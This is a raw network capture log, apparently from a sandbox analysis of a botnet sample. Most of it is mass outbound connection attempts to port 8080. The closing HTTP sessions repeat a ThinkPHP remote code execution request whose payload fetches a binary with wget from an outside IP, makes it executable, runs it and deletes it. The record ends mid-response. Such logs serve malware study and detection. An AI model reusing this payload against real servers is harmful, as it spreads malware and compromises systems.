                                                      Feb 14, 2024 09:28:49.291898012 CET67528080192.168.2.1562.142.152.14
                                                      Feb 14, 2024 09:28:49.291898012 CET67528080192.168.2.1595.95.123.123
                                                      Feb 14, 2024 09:28:49.291901112 CET67528080192.168.2.1594.42.156.30
                                                      Feb 14, 2024 09:28:49.291924000 CET67528080192.168.2.1594.92.142.225
                                                      Feb 14, 2024 09:28:49.291924000 CET67528080192.168.2.1594.190.70.73
                                                      Feb 14, 2024 09:28:49.291927099 CET67528080192.168.2.1585.22.34.183
                                                      Feb 14, 2024 09:28:49.291939974 CET67528080192.168.2.1585.199.63.161
                                                      Feb 14, 2024 09:28:49.291960955 CET67528080192.168.2.1595.196.198.190
                                                      Feb 14, 2024 09:28:49.291963100 CET67528080192.168.2.1595.47.135.173
                                                      Feb 14, 2024 09:28:49.291963100 CET67528080192.168.2.1562.104.235.140
                                                      Feb 14, 2024 09:28:49.291974068 CET67528080192.168.2.1595.31.254.117
                                                      Feb 14, 2024 09:28:49.291980982 CET67528080192.168.2.1585.208.88.226
                                                      Feb 14, 2024 09:28:49.291987896 CET67528080192.168.2.1585.7.108.192
                                                      Feb 14, 2024 09:28:49.292004108 CET67528080192.168.2.1585.132.229.42
                                                      Feb 14, 2024 09:28:49.292010069 CET67528080192.168.2.1585.164.144.102
                                                      Feb 14, 2024 09:28:49.292011976 CET67528080192.168.2.1595.14.184.109
                                                      Feb 14, 2024 09:28:49.292023897 CET67528080192.168.2.1594.250.48.24
                                                      Feb 14, 2024 09:28:49.292030096 CET67528080192.168.2.1562.111.92.2
                                                      Feb 14, 2024 09:28:49.292045116 CET67528080192.168.2.1531.247.101.76
                                                      Feb 14, 2024 09:28:49.292056084 CET67528080192.168.2.1595.78.83.168
                                                      Feb 14, 2024 09:28:49.292059898 CET67528080192.168.2.1585.207.143.253
                                                      Feb 14, 2024 09:28:49.292081118 CET67528080192.168.2.1594.142.147.21
                                                      Feb 14, 2024 09:28:49.292088032 CET67528080192.168.2.1585.83.182.158
                                                      Feb 14, 2024 09:28:49.292102098 CET67528080192.168.2.1595.188.83.11
                                                      Feb 14, 2024 09:28:49.292105913 CET67528080192.168.2.1585.62.0.228
                                                      Feb 14, 2024 09:28:49.292107105 CET67528080192.168.2.1595.224.204.215
                                                      Feb 14, 2024 09:28:49.292123079 CET67528080192.168.2.1594.44.152.69
                                                      Feb 14, 2024 09:28:49.292128086 CET67528080192.168.2.1562.218.15.148
                                                      Feb 14, 2024 09:28:49.292140007 CET67528080192.168.2.1595.171.192.209
                                                      Feb 14, 2024 09:28:49.292152882 CET67528080192.168.2.1585.249.110.162
                                                      Feb 14, 2024 09:28:49.292157888 CET67528080192.168.2.1585.76.132.237
                                                      Feb 14, 2024 09:28:49.292174101 CET67528080192.168.2.1531.163.21.133
                                                      Feb 14, 2024 09:28:49.292174101 CET67528080192.168.2.1531.200.8.24
                                                      Feb 14, 2024 09:28:49.292181969 CET67528080192.168.2.1562.201.91.123
                                                      Feb 14, 2024 09:28:49.292190075 CET67528080192.168.2.1585.142.183.251
                                                      Feb 14, 2024 09:28:49.292202950 CET67528080192.168.2.1585.106.241.201
                                                      Feb 14, 2024 09:28:49.292207956 CET67528080192.168.2.1594.174.238.51
                                                      Feb 14, 2024 09:28:49.292218924 CET67528080192.168.2.1585.69.177.18
                                                      Feb 14, 2024 09:28:49.292226076 CET67528080192.168.2.1585.133.12.112
                                                      Feb 14, 2024 09:28:49.292243958 CET67528080192.168.2.1595.178.184.42
                                                      Feb 14, 2024 09:28:49.292243958 CET67528080192.168.2.1585.119.84.135
                                                      Feb 14, 2024 09:28:49.292257071 CET67528080192.168.2.1585.98.38.156
                                                      Feb 14, 2024 09:28:49.292275906 CET67528080192.168.2.1594.119.187.127
                                                      Feb 14, 2024 09:28:49.292275906 CET67528080192.168.2.1562.162.10.211
                                                      Feb 14, 2024 09:28:49.292289019 CET67528080192.168.2.1585.104.122.91
                                                      Feb 14, 2024 09:28:49.292289019 CET67528080192.168.2.1531.99.218.211
                                                      Feb 14, 2024 09:28:49.292289019 CET67528080192.168.2.1594.200.105.214
                                                      Feb 14, 2024 09:28:49.292301893 CET67528080192.168.2.1562.197.51.162
                                                      Feb 14, 2024 09:28:49.292304039 CET67528080192.168.2.1594.111.244.208
                                                      Feb 14, 2024 09:28:49.292327881 CET67528080192.168.2.1562.159.184.80
                                                      Feb 14, 2024 09:28:49.292329073 CET67528080192.168.2.1585.211.87.151
                                                      Feb 14, 2024 09:28:49.292331934 CET67528080192.168.2.1562.12.225.71
                                                      Feb 14, 2024 09:28:49.292346001 CET67528080192.168.2.1531.229.91.163
                                                      Feb 14, 2024 09:28:49.292346001 CET67528080192.168.2.1594.5.251.250
                                                      Feb 14, 2024 09:28:49.292361975 CET67528080192.168.2.1531.179.168.254
                                                      Feb 14, 2024 09:28:49.292367935 CET67528080192.168.2.1595.88.64.245
                                                      Feb 14, 2024 09:28:49.292382002 CET67528080192.168.2.1531.146.128.121
                                                      Feb 14, 2024 09:28:49.292386055 CET67528080192.168.2.1594.107.186.229
                                                      Feb 14, 2024 09:28:49.292397022 CET67528080192.168.2.1531.173.115.189
                                                      Feb 14, 2024 09:28:49.292408943 CET67528080192.168.2.1585.158.237.178
                                                      Feb 14, 2024 09:28:49.292421103 CET67528080192.168.2.1595.241.221.108
                                                      Feb 14, 2024 09:28:49.292423964 CET67528080192.168.2.1562.126.177.159
                                                      Feb 14, 2024 09:28:49.292438030 CET67528080192.168.2.1595.171.78.77
                                                      Feb 14, 2024 09:28:49.292450905 CET67528080192.168.2.1594.3.82.168
                                                      Feb 14, 2024 09:28:49.292459965 CET67528080192.168.2.1531.178.155.188
                                                      Feb 14, 2024 09:28:49.292471886 CET67528080192.168.2.1531.91.52.50
                                                      Feb 14, 2024 09:28:49.292474985 CET67528080192.168.2.1594.71.126.100
                                                      Feb 14, 2024 09:28:49.292489052 CET67528080192.168.2.1531.83.100.253
                                                      Feb 14, 2024 09:28:49.292498112 CET67528080192.168.2.1595.238.114.251
                                                      Feb 14, 2024 09:28:49.292510033 CET67528080192.168.2.1562.237.226.194
                                                      Feb 14, 2024 09:28:49.292522907 CET67528080192.168.2.1531.121.44.167
                                                      Feb 14, 2024 09:28:49.292545080 CET67528080192.168.2.1595.174.62.187
                                                      Feb 14, 2024 09:28:49.292545080 CET67528080192.168.2.1594.62.183.209
                                                      Feb 14, 2024 09:28:49.292552948 CET67528080192.168.2.1562.31.57.97
                                                      Feb 14, 2024 09:28:49.292581081 CET67528080192.168.2.1595.70.136.138
                                                      Feb 14, 2024 09:28:49.292582035 CET67528080192.168.2.1595.133.233.32
                                                      Feb 14, 2024 09:28:49.292584896 CET67528080192.168.2.1594.186.117.132
                                                      Feb 14, 2024 09:28:49.292589903 CET67528080192.168.2.1531.95.8.135
                                                      Feb 14, 2024 09:28:49.292599916 CET67528080192.168.2.1562.246.224.49
                                                      Feb 14, 2024 09:28:49.292615891 CET67528080192.168.2.1594.37.234.101
                                                      Feb 14, 2024 09:28:49.292617083 CET67528080192.168.2.1562.202.143.83
                                                      Feb 14, 2024 09:28:49.292623043 CET67528080192.168.2.1595.251.224.153
                                                      Feb 14, 2024 09:28:49.292638063 CET67528080192.168.2.1595.12.105.125
                                                      Feb 14, 2024 09:28:49.292644978 CET67528080192.168.2.1594.134.45.246
                                                      Feb 14, 2024 09:28:49.292665005 CET67528080192.168.2.1594.164.95.5
                                                      Feb 14, 2024 09:28:49.292673111 CET67528080192.168.2.1594.221.198.228
                                                      Feb 14, 2024 09:28:49.292678118 CET67528080192.168.2.1595.0.241.118
                                                      Feb 14, 2024 09:28:49.292678118 CET67528080192.168.2.1562.253.114.226
                                                      Feb 14, 2024 09:28:49.292690039 CET807840112.169.109.50192.168.2.15
                                                      Feb 14, 2024 09:28:49.292699099 CET67528080192.168.2.1594.134.96.22
                                                      Feb 14, 2024 09:28:49.292705059 CET67528080192.168.2.1594.106.135.0
                                                      Feb 14, 2024 09:28:49.292718887 CET67528080192.168.2.1531.135.105.149
                                                      Feb 14, 2024 09:28:49.292722940 CET67528080192.168.2.1595.227.2.181
                                                      Feb 14, 2024 09:28:49.292735100 CET67528080192.168.2.1595.118.247.144
                                                      Feb 14, 2024 09:28:49.292742968 CET67528080192.168.2.1594.48.38.81
                                                      Feb 14, 2024 09:28:49.292757034 CET67528080192.168.2.1585.247.179.231
                                                      Feb 14, 2024 09:28:49.292761087 CET67528080192.168.2.1594.58.133.126
                                                      Feb 14, 2024 09:28:49.292777061 CET67528080192.168.2.1585.161.140.45
                                                      Feb 14, 2024 09:28:49.292789936 CET67528080192.168.2.1562.171.177.79
                                                      Feb 14, 2024 09:28:49.292790890 CET67528080192.168.2.1585.189.24.50
                                                      Feb 14, 2024 09:28:49.292804956 CET67528080192.168.2.1531.15.159.224
                                                      Feb 14, 2024 09:28:49.292817116 CET67528080192.168.2.1531.163.171.49
                                                      Feb 14, 2024 09:28:49.292824984 CET67528080192.168.2.1562.168.70.92
                                                      Feb 14, 2024 09:28:49.292838097 CET67528080192.168.2.1594.47.231.187
                                                      Feb 14, 2024 09:28:49.292848110 CET67528080192.168.2.1531.194.187.123
                                                      Feb 14, 2024 09:28:49.292853117 CET67528080192.168.2.1594.114.98.250
                                                      Feb 14, 2024 09:28:49.292862892 CET67528080192.168.2.1562.117.126.203
                                                      Feb 14, 2024 09:28:49.292865038 CET67528080192.168.2.1585.18.245.136
                                                      Feb 14, 2024 09:28:49.292877913 CET67528080192.168.2.1594.34.205.89
                                                      Feb 14, 2024 09:28:49.292890072 CET67528080192.168.2.1594.164.129.101
                                                      Feb 14, 2024 09:28:49.292896986 CET67528080192.168.2.1595.226.38.117
                                                      Feb 14, 2024 09:28:49.292903900 CET67528080192.168.2.1594.244.56.145
                                                      Feb 14, 2024 09:28:49.292911053 CET67528080192.168.2.1562.181.158.45
                                                      Feb 14, 2024 09:28:49.292922020 CET67528080192.168.2.1595.101.17.59
                                                      Feb 14, 2024 09:28:49.292941093 CET67528080192.168.2.1594.218.9.250
                                                      Feb 14, 2024 09:28:49.292941093 CET67528080192.168.2.1562.22.104.220
                                                      Feb 14, 2024 09:28:49.292946100 CET67528080192.168.2.1595.10.85.113
                                                      Feb 14, 2024 09:28:49.292953014 CET67528080192.168.2.1562.154.233.136
                                                      Feb 14, 2024 09:28:49.292978048 CET67528080192.168.2.1562.226.150.133
                                                      Feb 14, 2024 09:28:49.292983055 CET67528080192.168.2.1531.194.131.73
                                                      Feb 14, 2024 09:28:49.292983055 CET67528080192.168.2.1595.230.128.231
                                                      Feb 14, 2024 09:28:49.292989969 CET67528080192.168.2.1585.17.209.157
                                                      Feb 14, 2024 09:28:49.292999029 CET67528080192.168.2.1595.255.123.249
                                                      Feb 14, 2024 09:28:49.293003082 CET67528080192.168.2.1595.32.17.210
                                                      Feb 14, 2024 09:28:49.293020010 CET67528080192.168.2.1595.181.228.183
                                                      Feb 14, 2024 09:28:49.293031931 CET67528080192.168.2.1595.207.134.239
                                                      Feb 14, 2024 09:28:49.293047905 CET67528080192.168.2.1585.4.248.233
                                                      Feb 14, 2024 09:28:49.293056011 CET67528080192.168.2.1595.79.51.184
                                                      Feb 14, 2024 09:28:49.293059111 CET67528080192.168.2.1585.213.123.199
                                                      Feb 14, 2024 09:28:49.293070078 CET67528080192.168.2.1594.70.211.49
                                                      Feb 14, 2024 09:28:49.293078899 CET67528080192.168.2.1594.197.139.148
                                                      Feb 14, 2024 09:28:49.293087959 CET67528080192.168.2.1585.99.185.222
                                                      Feb 14, 2024 09:28:49.293101072 CET67528080192.168.2.1531.233.193.131
                                                      Feb 14, 2024 09:28:49.293104887 CET67528080192.168.2.1595.148.120.115
                                                      Feb 14, 2024 09:28:49.293124914 CET67528080192.168.2.1585.245.184.81
                                                      Feb 14, 2024 09:28:49.293132067 CET67528080192.168.2.1595.96.167.152
                                                      Feb 14, 2024 09:28:49.293133020 CET67528080192.168.2.1562.123.119.183
                                                      Feb 14, 2024 09:28:49.293145895 CET67528080192.168.2.1531.26.75.68
                                                      Feb 14, 2024 09:28:49.293148994 CET67528080192.168.2.1595.255.77.203
                                                      Feb 14, 2024 09:28:49.293158054 CET67528080192.168.2.1595.82.87.208
                                                      Feb 14, 2024 09:28:49.293169022 CET67528080192.168.2.1595.169.133.127
                                                      Feb 14, 2024 09:28:49.293183088 CET67528080192.168.2.1594.248.85.89
                                                      Feb 14, 2024 09:28:49.293184042 CET67528080192.168.2.1562.113.38.85
                                                      Feb 14, 2024 09:28:49.293196917 CET67528080192.168.2.1585.105.171.112
                                                      Feb 14, 2024 09:28:49.293196917 CET67528080192.168.2.1562.6.243.233
                                                      Feb 14, 2024 09:28:49.293215990 CET67528080192.168.2.1562.218.58.74
                                                      Feb 14, 2024 09:28:49.293221951 CET67528080192.168.2.1595.39.196.66
                                                      Feb 14, 2024 09:28:49.293221951 CET67528080192.168.2.1562.33.243.164
                                                      Feb 14, 2024 09:28:49.293241024 CET67528080192.168.2.1585.151.189.82
                                                      Feb 14, 2024 09:28:49.293252945 CET67528080192.168.2.1594.175.150.66
                                                      Feb 14, 2024 09:28:49.293256998 CET67528080192.168.2.1595.10.206.15
                                                      Feb 14, 2024 09:28:49.293267012 CET67528080192.168.2.1531.230.127.93
                                                      Feb 14, 2024 09:28:49.293272018 CET67528080192.168.2.1585.32.190.248
                                                      Feb 14, 2024 09:28:49.293287039 CET67528080192.168.2.1562.200.253.204
                                                      Feb 14, 2024 09:28:49.293296099 CET67528080192.168.2.1594.150.209.77
                                                      Feb 14, 2024 09:28:49.293304920 CET67528080192.168.2.1531.247.182.42
                                                      Feb 14, 2024 09:28:49.293313980 CET67528080192.168.2.1531.163.52.129
                                                      Feb 14, 2024 09:28:49.293332100 CET67528080192.168.2.1531.13.239.156
                                                      Feb 14, 2024 09:28:49.293337107 CET67528080192.168.2.1595.27.187.185
                                                      Feb 14, 2024 09:28:49.293346882 CET67528080192.168.2.1562.66.164.154
                                                      Feb 14, 2024 09:28:49.293360949 CET67528080192.168.2.1531.185.44.221
                                                      Feb 14, 2024 09:28:49.293366909 CET67528080192.168.2.1595.245.153.1
                                                      Feb 14, 2024 09:28:49.293390989 CET67528080192.168.2.1594.20.85.106
                                                      Feb 14, 2024 09:28:49.293390989 CET67528080192.168.2.1594.80.141.149
                                                      Feb 14, 2024 09:28:49.293404102 CET67528080192.168.2.1595.165.180.205
                                                      Feb 14, 2024 09:28:49.293412924 CET67528080192.168.2.1531.52.199.225
                                                      Feb 14, 2024 09:28:49.293420076 CET67528080192.168.2.1562.225.138.187
                                                      Feb 14, 2024 09:28:49.293426991 CET67528080192.168.2.1531.20.161.221
                                                      Feb 14, 2024 09:28:49.293438911 CET67528080192.168.2.1585.159.66.2
                                                      Feb 14, 2024 09:28:49.293446064 CET67528080192.168.2.1585.106.131.3
                                                      Feb 14, 2024 09:28:49.293462038 CET67528080192.168.2.1594.155.131.189
                                                      Feb 14, 2024 09:28:49.293463945 CET67528080192.168.2.1585.201.220.194
                                                      Feb 14, 2024 09:28:49.293479919 CET67528080192.168.2.1531.31.95.195
                                                      Feb 14, 2024 09:28:49.293486118 CET67528080192.168.2.1595.79.170.156
                                                      Feb 14, 2024 09:28:49.293492079 CET8051906112.169.120.242192.168.2.15
                                                      Feb 14, 2024 09:28:49.293500900 CET67528080192.168.2.1594.101.19.107
                                                      Feb 14, 2024 09:28:49.293504000 CET67528080192.168.2.1585.38.245.24
                                                      Feb 14, 2024 09:28:49.293509960 CET67528080192.168.2.1585.51.114.189
                                                      Feb 14, 2024 09:28:49.293513060 CET67528080192.168.2.1585.134.75.147
                                                      Feb 14, 2024 09:28:49.293528080 CET67528080192.168.2.1531.28.124.171
                                                      Feb 14, 2024 09:28:49.293531895 CET67528080192.168.2.1595.129.141.49
                                                      Feb 14, 2024 09:28:49.293557882 CET5190680192.168.2.15112.169.120.242
                                                      Feb 14, 2024 09:28:49.293557882 CET67528080192.168.2.1531.164.209.71
                                                      Feb 14, 2024 09:28:49.293560028 CET67528080192.168.2.1585.203.159.10
                                                      Feb 14, 2024 09:28:49.293566942 CET67528080192.168.2.1531.58.182.199
                                                      Feb 14, 2024 09:28:49.293581009 CET67528080192.168.2.1594.62.100.82
                                                      Feb 14, 2024 09:28:49.293591022 CET67528080192.168.2.1595.143.101.119
                                                      Feb 14, 2024 09:28:49.293596983 CET67528080192.168.2.1585.131.176.248
                                                      Feb 14, 2024 09:28:49.293613911 CET67528080192.168.2.1594.226.160.9
                                                      Feb 14, 2024 09:28:49.293617010 CET67528080192.168.2.1531.82.8.22
                                                      Feb 14, 2024 09:28:49.293627977 CET67528080192.168.2.1562.239.16.13
                                                      Feb 14, 2024 09:28:49.293631077 CET67528080192.168.2.1594.51.141.227
                                                      Feb 14, 2024 09:28:49.293644905 CET67528080192.168.2.1562.247.204.78
                                                      Feb 14, 2024 09:28:49.293648005 CET67528080192.168.2.1585.222.110.231
                                                      Feb 14, 2024 09:28:49.293663025 CET67528080192.168.2.1594.85.189.135
                                                      Feb 14, 2024 09:28:49.293673992 CET67528080192.168.2.1595.241.207.133
                                                      Feb 14, 2024 09:28:49.293682098 CET67528080192.168.2.1562.5.86.142
                                                      Feb 14, 2024 09:28:49.293692112 CET67528080192.168.2.1595.125.150.133
                                                      Feb 14, 2024 09:28:49.293710947 CET67528080192.168.2.1531.253.30.194
                                                      Feb 14, 2024 09:28:49.293713093 CET67528080192.168.2.1531.163.4.196
                                                      Feb 14, 2024 09:28:49.293729067 CET67528080192.168.2.1594.210.138.129
                                                      Feb 14, 2024 09:28:49.293740034 CET67528080192.168.2.1531.10.48.134
                                                      Feb 14, 2024 09:28:49.293751001 CET67528080192.168.2.1585.134.92.166
                                                      Feb 14, 2024 09:28:49.293759108 CET67528080192.168.2.1595.71.86.160
                                                      Feb 14, 2024 09:28:49.293772936 CET67528080192.168.2.1562.162.141.2
                                                      Feb 14, 2024 09:28:49.293781042 CET67528080192.168.2.1562.245.137.64
                                                      Feb 14, 2024 09:28:49.293787003 CET67528080192.168.2.1595.225.59.134
                                                      Feb 14, 2024 09:28:49.293797970 CET67528080192.168.2.1531.249.79.87
                                                      Feb 14, 2024 09:28:49.293804884 CET67528080192.168.2.1585.117.43.70
                                                      Feb 14, 2024 09:28:49.293804884 CET67528080192.168.2.1531.42.154.111
                                                      Feb 14, 2024 09:28:49.293811083 CET67528080192.168.2.1562.121.17.27
                                                      Feb 14, 2024 09:28:49.293823004 CET67528080192.168.2.1595.126.249.216
                                                      Feb 14, 2024 09:28:49.293833017 CET67528080192.168.2.1531.205.44.76
                                                      Feb 14, 2024 09:28:49.293848038 CET67528080192.168.2.1531.73.67.146
                                                      Feb 14, 2024 09:28:49.293849945 CET67528080192.168.2.1594.95.45.188
                                                      Feb 14, 2024 09:28:49.293859005 CET67528080192.168.2.1585.74.227.234
                                                      Feb 14, 2024 09:28:49.293873072 CET67528080192.168.2.1594.87.31.37
                                                      Feb 14, 2024 09:28:49.293879032 CET67528080192.168.2.1594.8.206.218
                                                      Feb 14, 2024 09:28:49.293884993 CET67528080192.168.2.1595.105.103.66
                                                      Feb 14, 2024 09:28:49.293896914 CET67528080192.168.2.1594.135.216.209
                                                      Feb 14, 2024 09:28:49.293903112 CET67528080192.168.2.1594.9.107.54
                                                      Feb 14, 2024 09:28:49.293912888 CET67528080192.168.2.1531.234.234.94
                                                      Feb 14, 2024 09:28:49.293926001 CET67528080192.168.2.1594.229.139.155
                                                      Feb 14, 2024 09:28:49.293935061 CET67528080192.168.2.1562.39.39.43
                                                      Feb 14, 2024 09:28:49.293947935 CET67528080192.168.2.1595.206.232.128
                                                      Feb 14, 2024 09:28:49.293960094 CET67528080192.168.2.1531.138.120.67
                                                      Feb 14, 2024 09:28:49.293962955 CET67528080192.168.2.1585.43.116.83
                                                      Feb 14, 2024 09:28:49.293973923 CET67528080192.168.2.1585.205.82.54
                                                      Feb 14, 2024 09:28:49.293973923 CET67528080192.168.2.1594.171.27.29
                                                      Feb 14, 2024 09:28:49.293993950 CET67528080192.168.2.1531.133.43.212
                                                      Feb 14, 2024 09:28:49.294002056 CET67528080192.168.2.1595.149.8.57
                                                      Feb 14, 2024 09:28:49.294006109 CET67528080192.168.2.1595.8.120.151
                                                      Feb 14, 2024 09:28:49.294020891 CET67528080192.168.2.1562.171.230.3
                                                      Feb 14, 2024 09:28:49.294023037 CET67528080192.168.2.1585.160.193.214
                                                      Feb 14, 2024 09:28:49.294035912 CET67528080192.168.2.1595.53.154.102
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Feb 14, 2024 09:31:28.000519037 CET192.168.2.158.8.8.80x19ffStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                      Feb 14, 2024 09:31:28.000519037 CET192.168.2.158.8.8.80x2e27Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Feb 14, 2024 09:31:28.102827072 CET8.8.8.8192.168.2.150x19ffNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                      Feb 14, 2024 09:31:28.102827072 CET8.8.8.8192.168.2.150x19ffNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      0192.168.2.155837888.221.78.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:46.581700087 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:46.792071104 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:28:46 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 65 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 36 26 23 34 36 3b 31 39 38 36 39 33 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;eee6655f&#46;1707899326&#46;19869321</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1192.168.2.155670488.149.181.11580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:46.591603041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:46.812359095 CET450INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2192.168.2.155322688.119.167.11580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:46.591804028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:46.813528061 CET352INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=15768000
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3192.168.2.1560060112.175.243.5680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.077013969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.359303951 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Connection: close
                                                      Content-Length: 311
